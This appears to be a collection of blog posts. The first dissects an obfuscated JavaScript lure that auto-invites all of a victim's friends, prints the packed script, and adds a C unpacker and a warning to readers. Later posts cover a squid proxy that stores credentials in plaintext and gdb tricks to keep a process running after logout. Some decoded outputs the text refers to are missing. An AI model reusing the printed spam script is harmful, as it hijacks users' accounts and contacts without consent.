b = "app120196878004524_jode";
ifc = "app120196878004524_ifc";
ifo = "app120196878004524_ifo";
mw = "app120196878004524_mwrapper";
function ff(p, a, c, k, e, r) {
 e = function (c) {
  return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
 };
 if (!"".replace(/^/, String)) {
  while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1;
 }
 while (c--) {
  if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);}
 }
 return p;
}
str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {});

// and let's print the string that gets evaluated
print(str);

which, when run with the `js' shell, gives the output

var _0x95ea=[ "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",

note that executing print(_0x95ea); gives


so, the final code that gets executed is


Essentially, the script automatically brings up the `suggest to friends' window listing all your friends, selects them all and submits the invitation request on your behalf (using MouseEvents with setTimeout).

Note that the code template is the same for all applications of this kind; only the application-specific IDs ("app120196878004524_jop" etc.) change.
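The packer wrapper (the ff function) is just as generic. Its e(c) helper writes numbers in base 62 (digits, then a-z, then A-Z), and every word of the packed string is replaced by the dictionary entry with that number. Here is a C rendition of the same idea, for decoding such scripts without running them in a JavaScript shell. The names are hypothetical, the radix is assumed to be at most 62, and unknown words are copied through unchanged (a simplification: the JavaScript version would insert "undefined").

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Mirror of the packer's e(c): `c` in base `radix` (<= 62) using 0-9, then
 * a-z for 10..35, then A-Z (value + 29 as ASCII). NUL-terminates `out` and
 * returns the number of characters written. */
size_t packer_encode(unsigned c, unsigned radix, char *out)
{
    size_t n = 0;
    if (c >= radix)
        n = packer_encode(c / radix, radix, out);
    unsigned d = c % radix;
    out[n++] = (char)(d < 10 ? '0' + d : d <= 35 ? 'a' + (d - 10) : d + 29);
    out[n] = '\0';
    return n;
}

/* Same character class as JavaScript's \w. */
static int is_word_char(char ch)
{
    return isalnum((unsigned char)ch) || ch == '_';
}

/* Replaces every whole word of `p` that encodes a number i < count by
 * words[i]; empty entries and unknown words are copied unchanged. */
void packer_unpack(const char *p, unsigned radix, const char *const *words,
                   unsigned count, char *out, size_t cap)
{
    size_t o = 0;
    char tok[40];
    if (cap == 0)
        return;
    while (*p != '\0' && o + 1 < cap) {
        if (!is_word_char(*p)) {
            out[o++] = *p++;
            continue;
        }
        const char *start = p;
        while (is_word_char(*p))
            p++;
        size_t len = (size_t)(p - start);
        const char *rep = start;
        size_t rep_len = len;
        for (unsigned i = 0; i < count; i++) {
            if (packer_encode(i, radix, tok) == len && memcmp(tok, start, len) == 0) {
                if (words[i][0] != '\0') {
                    rep = words[i];
                    rep_len = strlen(rep);
                }
                break;
            }
        }
        for (size_t j = 0; j < rep_len && o + 1 < cap; j++)
            out[o++] = rep[j];
    }
    out[o] = '\0';
}
```

With radix 62 and the 69-entry word list from the script, J maps to var, e to _0x95ea, and n, g, j to x76, x69, x73, which is how strings like \\n\\g\\j... turn into the \x escapes of "visibility" seen in the output.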

In general, whenever someone asks you to execute a piece of JavaScript in the address bar, consider it harmful. This one does not steal your identity, so no worries; but you have every reason to believe the next one will.

Take care.

Authenticated corporate proxy woes - Local squid cache peer proxy

How many times has it happened at school or work that software you want to use needs to connect to the Internet but cannot get through the stupid proxy? I know I've suffered a lot due to this. Moreover, it looks like companies such as Nokia, Ubisoft etc. do not really care about people behind authenticated proxies either. It is really surprising (and annoying) to see so much nice software without support for authenticated proxies. That also includes the all new `awesome' (sarcasm intended) chat client that comes by default with Ubuntu, Empathy.

Or are you otherwise pissed off because you have to type your proxy credentials in all those different places? There are KDE settings, GNOME settings, (e)links, subversion config, yum/apt configuration, entering the password a thousand times when firefox (pre-3.6) restarts, looks for updates and reopens all those tabs, etc. etc., or IE settings for Windows users, and the "netsh winhttp set proxy" method to get your Windows 7 updates through the proxy.

Yes. Very, very annoying.

What if you could delegate the authentication to some other service running on and strictly for your computer only? How about your own proxy server running on your machine that delegates requests to your organization's proxy with proper authentication so that you no longer have to worry about authentication?

Running local squid

The basic idea is this: we run a local instance of squid as a peer proxy to the organization's proxy, authenticating on your behalf. This means you can now set the proxy to localhost and connect; the authentication is taken care of by the local squid. Not just that, it also reduces some load on your organization's proxy, as it caches (static, by default) content.

Just append these lines to your /etc/squid/squid.conf

cache_peer proxy.addr parent [proxy.addr proxy port] [proxy.addr icp port] default no-query login=[login_name]:[pass]

# to bypass the proxy for local or LAN access
acl local_domain dstdomain .local.domain
acl local_nat dst [local.network/netmask]
always_direct allow local_domain
always_direct allow local_nat

# everything else must pass through the parent. No direct access allowed.
never_direct allow all

Let us dissect the config:
  • cache_peer proxy.addr tells squid to work as a peer proxy to your organization's proxy (proxy.addr).
  • parent tells squid that proxy.addr is one of its parents in the cache hierarchy.
  • [proxy.addr proxy port] the port on which the organization's proxy accepts connections.
  • [proxy.addr icp port] the port on which the organization's proxy listens for ICP requests.
Now the options:
  • default marks this parent as the last-resort parent, used when no other peer-selection method finds one.
  • no-query in case your proxy does not provide ICP support, or you do not want to enable it, this option stops our squid from sending ICP requests and avoids unnecessary delays.
  • login=[login_name]:[pass] self explanatory.

Note that you need to take care of forwarding any special ports your applications might need.

This method works only for basic authentication (credentials sent base64 encoded).
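Basic authentication is only an encoding: the request carries a Proxy-Authorization: Basic header followed by the base64 of login:password, which is exactly why the plaintext password matters. A minimal base64 encoder in C to show what goes over the wire; the function names are hypothetical.

```c
#include <stddef.h>
#include <string.h>

static const char b64_alphabet[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Standard base64 (RFC 4648) of `len` bytes from `in` into `out`, with '='
 * padding and a terminating NUL. `out` needs 4 * ((len + 2) / 3) + 1 bytes. */
void base64_encode(const unsigned char *in, size_t len, char *out)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i += 3) {
        unsigned v = (unsigned)in[i] << 16;
        if (i + 1 < len)
            v |= (unsigned)in[i + 1] << 8;
        if (i + 2 < len)
            v |= in[i + 2];
        out[o++] = b64_alphabet[(v >> 18) & 0x3F];
        out[o++] = b64_alphabet[(v >> 12) & 0x3F];
        out[o++] = i + 1 < len ? b64_alphabet[(v >> 6) & 0x3F] : '=';
        out[o++] = i + 2 < len ? b64_alphabet[v & 0x3F] : '=';
    }
    out[o] = '\0';
}

/* Convenience wrapper for text such as "login:password". */
void base64_encode_str(const char *s, char *out)
{
    base64_encode((const unsigned char *)s, strlen(s), out);
}
```

For instance, the credentials Aladdin:open sesame (the example used in RFC 7617) encode to QWxhZGRpbjpvcGVuIHNlc2FtZQ==, and anyone who sees that header can decode them just as easily.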

There are some obvious security concerns. First, your password is stored in plaintext, so make sure that non-root users have *no* permissions on /etc/squid/squid.conf. Also make sure that this proxy accepts connections only from localhost. Even then a security hole remains: anyone who logs into your machine, even as a normal or guest user, can use your connection.

This method works on all Unices, Linux as well as Windows.

Continue running a non nohup-ed command after logout (no SIGHUP)

Many times you start a command that takes a fairly long time to complete, and before it ends you must log out for some reason: maybe the network will go down soon, or you do not want to keep staring at the screen till it completes, or you just don't want to keep that terminal around.

A bit of shell behaviour for the uninformed: when you launch a command from a shell, the new process is created by fork()ing the current shell and immediately exec()ing the command's executable, which means the new process is a child of the shell process. You can stop a running process and keep it running in the background as

% java some.long.running.application
{java program spits out something}
{hit ^z}
zsh: suspended  java some.long.running.application
% bg
[1]  + continued  java some.long.running.application

or you can start it in background as

% java some.long.running.application &
[1]  1001
{java program spits out something}

of course you can bring these jobs in foreground any time you want

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% fg %2 {bash users must drop the %}
[2]    running    java some.long.running.application
{java program spits out something}

Now you want to log out. The moment you log out of the terminal, the shell sends the SIGHUP signal to all running children, and SIGCONT followed by SIGHUP to all stopped children. The default action of a process on receiving SIGHUP is to terminate, so any applications, foreground as well as background, that were started from this shell are killed. We want our application to survive the logout.

The textbook way of doing this is to start the command with `nohup' as

% nohup java some.long.running.application &
[1] 1001
% logout

or the subshell trick :

% (java some.long.running.application &)
% {prompt returns, java disowned}
{java program spits out something}

zsh users can do it as :

% java some.long.running.application &!
% {prompt returns, java disowned}
{java program spits out something}

Or use the good old screen (my favorite)!

Now suppose you unfortunately did not start the process with nohup or the subshell trick, and the process cannot be restarted for some reason, or it has already done significant work.

What if we could tell the shell not to send SIGHUP to a particular child?
`disown' command lets you do just that! :D

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% disown %2 {bash users must drop the %, also bashers can add -h option}
{java program spits out something}

This tells the shell not to send SIGHUP to our precious java process. And you'd think you can now happily log out with java process still running.

Well, not quite. Say the shell has pid 1000 and java process has pid 1001, then

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

This means that process 1001 uses terminal /dev/pts/1 as its stdin, stdout and stderr. Even if we disown the java process, terminal device /dev/pts/1 will no longer be available once the shell quits, and hence the next read or write by the java process on any of stdin/stdout/stderr will probably fail and may abort it. Even if it does not abort, you might want to capture the program's stdout and stderr somewhere, to a file maybe, and possibly feed some file to it as input. After logout that is no longer possible, as

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1 (deleted)
lrwx------. {...} 1 -> /dev/pts/1 (deleted)
lrwx------. {...} 2 -> /dev/pts/1 (deleted)

Sad, isn't it?

Not quite!

Let us analyze how nohup works. If nohup's output is not redirected to some file, all output of the nohup-ed program goes to a default file (nohup.out in the current directory, or $HOME/nohup.out if that cannot be written). In any case, nohup holds a writeable file descriptor to the file where the output is supposed to go. Before exec()ing the command (the shell has already done the fork()), nohup sets SIGHUP to be ignored and duplicates this fd onto stdout and stderr using dup2(). The ignored SIGHUP survives the exec(), so the program keeps running after the shell is gone (it is then re-parented to init, i.e. its parent pid becomes 1), and its stdout and stderr stay valid because they no longer refer to the shell's terminal but to a real open file. Stdin is probably uncared for, as we are running the process in background, non-interactive mode after all.
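The ignore-SIGHUP, dup2(), exec() sequence can be sketched in C. This is a simplified, hypothetical run_detached helper, not nohup's source: nohup itself does not fork (the shell already did), but a helper called from an ordinary program has to. It assumes a POSIX system; the output file name is a placeholder, and wait_exit_status is only there to make the sketch easy to try out.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: starts argv[0] (searched in PATH) with SIGHUP ignored
 * and stdout/stderr appended to `outfile`. Returns the child's pid, or -1
 * if fork() failed. */
pid_t run_detached(char *const argv[], const char *outfile)
{
    pid_t pid = fork();
    if (pid != 0)
        return pid; /* parent, or -1 on error */

    /* Child: an ignored SIGHUP stays ignored across exec(). */
    signal(SIGHUP, SIG_IGN);
    int fd = open(outfile, O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0)
        _exit(127);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    if (fd > STDERR_FILENO)
        close(fd);
    int devnull = open("/dev/null", O_RDONLY); /* detach stdin from the tty */
    if (devnull >= 0) {
        dup2(devnull, STDIN_FILENO);
        if (devnull > STDIN_FILENO)
            close(devnull);
    }
    execvp(argv[0], argv);
    _exit(127); /* only reached if exec failed */
}

/* Waits for `pid`; returns its exit status, or -1 if it did not exit normally. */
int wait_exit_status(pid_t pid)
{
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```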

The question is: all this is fine because it is done _before_ the java process starts. What can we do to change its stdout and stderr _after_ it has already been launched?
Note that we cannot modify /proc/1001/fd/1 to link to some real file (me wonders what issues would creep up if that were allowed).

Our good old friend gdb comes to the rescue! The solution is trivial: just attach to the process, open() the file you want the output to go to from within that program, and dup2() the new fd onto 1 and 2 :D

% gdb -p 1001
Attaching to process 1001
Reading symbols from /usr/bin/java...(no debugging symbols found)...done.
(gdb) call (int)open("/home/prashant/tmp/output", O_WRONLY | O_CREAT | O_APPEND, 0644)
$1 = 5
(gdb) call (int)dup2(5,1)
$2 = 1
(gdb) call (int)open("/home/prashant/tmp/output.err", O_WRONLY | O_CREAT | O_APPEND, 0644)
$3 = 6
(gdb) call (int)dup2(6,2)
$4 = 2
(gdb) detach 
Detaching from program: /usr/bin/java, process 1001
(gdb) quit

If gdb does not know the O_ macros (e.g. no debug info), replace them with their actual values from fcntl.h; on Linux x86 and x86-64, O_WRONLY | O_CREAT | O_APPEND is 0x441:

(gdb) call (int)dup2((int)open("/home/prashant/tmp/output", 0x441, 0644),1)
$1 = 1
(gdb) call (int)dup2((int)open("/home/prashant/tmp/output.err", 0x441, 0644),2)
$2 = 2
(gdb) detach

Note that you can redirect stdout and stderr to the same file if you wish (just be careful with append mode on NFS, and with truncate mode in general ;).

And that's about it. Go ahead and logout. Your process should be busy while you are gone.

PS : this will work as long as the program does not try to read anything from stdin. If and when it does, it may crash depending on whether the program abort()s when it can not do basic IO on fds 0,1 and 2. You might want to open another file to read and use dup2() in similar way if you plan to provide input from a file.